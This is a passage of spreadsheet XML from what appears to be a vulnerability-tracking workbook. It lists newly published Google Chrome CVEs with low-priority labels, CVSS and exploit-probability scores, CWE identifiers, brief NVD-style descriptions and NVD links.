          <t>CWE-352</t>
        </is>
      </c>
      <c r="R1141" s="5" t="inlineStr">
        <is>
          <t>Cross-site request forgery in DeviceBoundSessionCredentials in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87449</t>
        </is>
      </c>
    </row>
    <row r="1142">
      <c r="A1142" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87461</t>
        </is>
      </c>
      <c r="D1142" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1142" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1142" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1142" s="5" t="inlineStr"/>
      <c r="H1142" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1142" s="5" t="inlineStr"/>
      <c r="J1142" s="5" t="inlineStr"/>
      <c r="K1142" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1142" s="5" t="inlineStr"/>
      <c r="M1142" s="5" t="inlineStr"/>
      <c r="N1142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1142" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1142" s="5" t="inlineStr"/>
      <c r="Q1142" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1142" s="5" t="inlineStr">
        <is>
          <t>Information leak in Core in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak cross-origin data via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87461</t>
        </is>
      </c>
    </row>
    <row r="1143">
      <c r="A1143" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87466</t>
        </is>
      </c>
      <c r="D1143" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1143" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1143" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1143" s="5" t="inlineStr"/>
      <c r="H1143" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1143" s="5" t="inlineStr"/>
      <c r="J1143" s="5" t="inlineStr"/>
      <c r="K1143" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1143" s="5" t="inlineStr"/>
      <c r="M1143" s="5" t="inlineStr"/>
      <c r="N1143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1143" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1143" s="5" t="inlineStr"/>
      <c r="Q1143" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1143" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Workers in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87466</t>
        </is>
      </c>
    </row>
    <row r="1144">
      <c r="A1144" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87469</t>
        </is>
      </c>
      <c r="D1144" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1144" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1144" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1144" s="5" t="inlineStr"/>
      <c r="H1144" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1144" s="5" t="inlineStr"/>
      <c r="J1144" s="5" t="inlineStr"/>
      <c r="K1144" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1144" s="5" t="inlineStr"/>
      <c r="M1144" s="5" t="inlineStr"/>
      <c r="N1144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1144" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1144" s="5" t="inlineStr"/>
      <c r="Q1144" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1144" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy into a privileged page via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87469</t>
        </is>
      </c>
    </row>
    <row r="1145">
      <c r="A1145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87495</t>
        </is>
      </c>
      <c r="D1145" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1145" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1145" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1145" s="5" t="inlineStr"/>
      <c r="H1145" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1145" s="5" t="inlineStr"/>
      <c r="J1145" s="5" t="inlineStr"/>
      <c r="K1145" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1145" s="5" t="inlineStr"/>
      <c r="M1145" s="5" t="inlineStr"/>
      <c r="N1145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1145" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1145" s="5" t="inlineStr"/>
      <c r="Q1145" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1145" s="5" t="inlineStr">
        <is>
          <t>Information leak in Scroll in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87495</t>
        </is>
      </c>
    </row>
    <row r="1146">
      <c r="A1146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87497</t>
        </is>
      </c>
      <c r="D1146" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1146" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1146" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1146" s="5" t="inlineStr"/>
      <c r="H1146" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1146" s="5" t="inlineStr"/>
      <c r="J1146" s="5" t="inlineStr"/>
      <c r="K1146" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1146" s="5" t="inlineStr"/>
      <c r="M1146" s="5" t="inlineStr"/>
      <c r="N1146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1146" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1146" s="5" t="inlineStr"/>
      <c r="Q1146" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R1146" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in Codecs in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to read memory inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87497</t>
        </is>
      </c>
    </row>
    <row r="1147">
      <c r="A1147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87508</t>
        </is>
      </c>
      <c r="D1147" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1147" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1147" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1147" s="5" t="inlineStr"/>
      <c r="H1147" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1147" s="5" t="inlineStr"/>
      <c r="J1147" s="5" t="inlineStr"/>
      <c r="K1147" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1147" s="5" t="inlineStr"/>
      <c r="M1147" s="5" t="inlineStr"/>
      <c r="N1147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1147" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1147" s="5" t="inlineStr"/>
      <c r="Q1147" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1147" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Loader in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87508</t>
        </is>
      </c>
    </row>
    <row r="1148">
      <c r="A1148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87511</t>
        </is>
      </c>
      <c r="D1148" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1148" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1148" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1148" s="5" t="inlineStr"/>
      <c r="H1148" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1148" s="5" t="inlineStr"/>
      <c r="J1148" s="5" t="inlineStr"/>
      <c r="K1148" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1148" s="5" t="inlineStr"/>
      <c r="M1148" s="5" t="inlineStr"/>
      <c r="N1148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1148" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1148" s="5" t="inlineStr"/>
      <c r="Q1148" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1148" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain cross-origin data via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87511</t>
        </is>
      </c>
    </row>
    <row r="1149">
      <c r="A1149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87516</t>
        </is>
      </c>
      <c r="D1149" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1149" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1149" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1149" s="5" t="inlineStr"/>
      <c r="H1149" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1149" s="5" t="inlineStr"/>
      <c r="J1149" s="5" t="inlineStr"/>
      <c r="K1149" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1149" s="5" t="inlineStr"/>
      <c r="M1149" s="5" t="inlineStr"/>
      <c r="N1149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1149" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1149" s="5" t="inlineStr"/>
      <c r="Q1149" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="R1149" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Navigation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87516</t>
        </is>
      </c>
    </row>
    <row r="1150">
      <c r="A1150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87543</t>
        </is>
      </c>
      <c r="D1150" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1150" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1150" s="5" t="inlineStr"/>
      <c r="H1150" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1150" s="5" t="inlineStr"/>
      <c r="J1150" s="5" t="inlineStr"/>
      <c r="K1150" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1150" s="5" t="inlineStr"/>
      <c r="M1150" s="5" t="inlineStr"/>
      <c r="N1150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1150" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1150" s="5" t="inlineStr"/>
      <c r="Q1150" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1150" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Core in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87543</t>
        </is>
      </c>
    </row>
    <row r="1151">
      <c r="A1151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87546</t>
        </is>
      </c>
      <c r="D1151" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1151" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1151" s="5" t="inlineStr"/>
      <c r="H1151" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1151" s="5" t="inlineStr"/>
      <c r="J1151" s="5" t="inlineStr"/>
      <c r="K1151" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L1151" s="5" t="inlineStr"/>
      <c r="M1151" s="5" t="inlineStr"/>
      <c r="N1151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1151" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1151" s="5" t="inlineStr"/>
      <c r="Q1151" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="R1151" s="5" t="inlineStr">
        <is>
          <t>Incorrect type conversion or cast in Safebrowsing in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted file. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87546</t>
        </is>
      </c>
    </row>
    <row r="1152">
      <c r="A1152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87548</t>
        </is>
      </c>
      <c r="D1152" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1152" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1152" s="5" t="inlineStr"/>
      <c r="H1152" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1152" s="5" t="inlineStr"/>
      <c r="J1152" s="5" t="inlineStr"/>
      <c r="K1152" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1152" s="5" t="inlineStr"/>
      <c r="M1152" s="5" t="inlineStr"/>
      <c r="N1152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1152" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1152" s="5" t="inlineStr"/>
      <c r="Q1152" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R1152" s="5" t="inlineStr">
        <is>
          <t>Improper state validation in Installer in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87548</t>
        </is>
      </c>
    </row>
    <row r="1153">
      <c r="A1153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87550</t>
        </is>
      </c>
      <c r="D1153" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1153" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1153" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1153" s="5" t="inlineStr"/>
      <c r="H1153" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1153" s="5" t="inlineStr"/>
      <c r="J1153" s="5" t="inlineStr"/>
      <c r="K1153" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1153" s="5" t="inlineStr"/>
      <c r="M1153" s="5" t="inlineStr"/>
      <c r="N1153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1153" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1153" s="5" t="inlineStr"/>
      <c r="Q1153" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="R1153" s="5" t="inlineStr">
        <is>
          <t>Improper encoding or escaping of output in CSS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87550</t>
        </is>
      </c>
    </row>
    <row r="1154">
      <c r="A1154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87551</t>
        </is>
      </c>
      <c r="D1154" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1154" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1154" s="5" t="inlineStr"/>
      <c r="H1154" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1154" s="5" t="inlineStr"/>
      <c r="J1154" s="5" t="inlineStr"/>
      <c r="K1154" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1154" s="5" t="inlineStr"/>
      <c r="M1154" s="5" t="inlineStr"/>
      <c r="N1154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1154" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1154" s="5" t="inlineStr"/>
      <c r="Q1154" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R1154" s="5" t="inlineStr">
        <is>
          <t>Improper certificate validation in CORS in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87551</t>
        </is>
      </c>
    </row>
    <row r="1155">
      <c r="A1155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87556</t>
        </is>
      </c>
      <c r="D1155" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1155" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1155" s="5" t="inlineStr"/>
      <c r="H1155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1155" s="5" t="inlineStr"/>
      <c r="J1155" s="5" t="inlineStr"/>
      <c r="K1155" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1155" s="5" t="inlineStr"/>
      <c r="M1155" s="5" t="inlineStr"/>
      <c r="N1155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1155" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1155" s="5" t="inlineStr"/>
      <c r="Q1155" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1155" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Browser in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87556</t>
        </is>
      </c>
    </row>
    <row r="1156">
      <c r="A1156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87557</t>
        </is>
      </c>
      <c r="D1156" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1156" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1156" s="5" t="inlineStr"/>
      <c r="H1156" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1156" s="5" t="inlineStr"/>
      <c r="J1156" s="5" t="inlineStr"/>
      <c r="K1156" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1156" s="5" t="inlineStr"/>
      <c r="M1156" s="5" t="inlineStr"/>
      <c r="N1156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1156" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1156" s="5" t="inlineStr"/>
      <c r="Q1156" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1156" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in LocalNetworkAccess in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87557</t>
        </is>
      </c>
    </row>
    <row r="1157">
      <c r="A1157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87560</t>
        </is>
      </c>
      <c r="D1157" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1157" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1157" s="5" t="inlineStr"/>
      <c r="H1157" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1157" s="5" t="inlineStr"/>
      <c r="J1157" s="5" t="inlineStr"/>
      <c r="K1157" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1157" s="5" t="inlineStr"/>
      <c r="M1157" s="5" t="inlineStr"/>
      <c r="N1157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1157" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1157" s="5" t="inlineStr"/>
      <c r="Q1157" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1157" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Browser in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87560</t>
        </is>
      </c>
    </row>
    <row r="1158">
      <c r="A1158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87561</t>
        </is>
      </c>
      <c r="D1158" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1158" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1158" s="5" t="inlineStr"/>
      <c r="H1158" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1158" s="5" t="inlineStr"/>
      <c r="J1158" s="5" t="inlineStr"/>
      <c r="K1158" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1158" s="5" t="inlineStr"/>
      <c r="M1158" s="5" t="inlineStr"/>
      <c r="N1158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
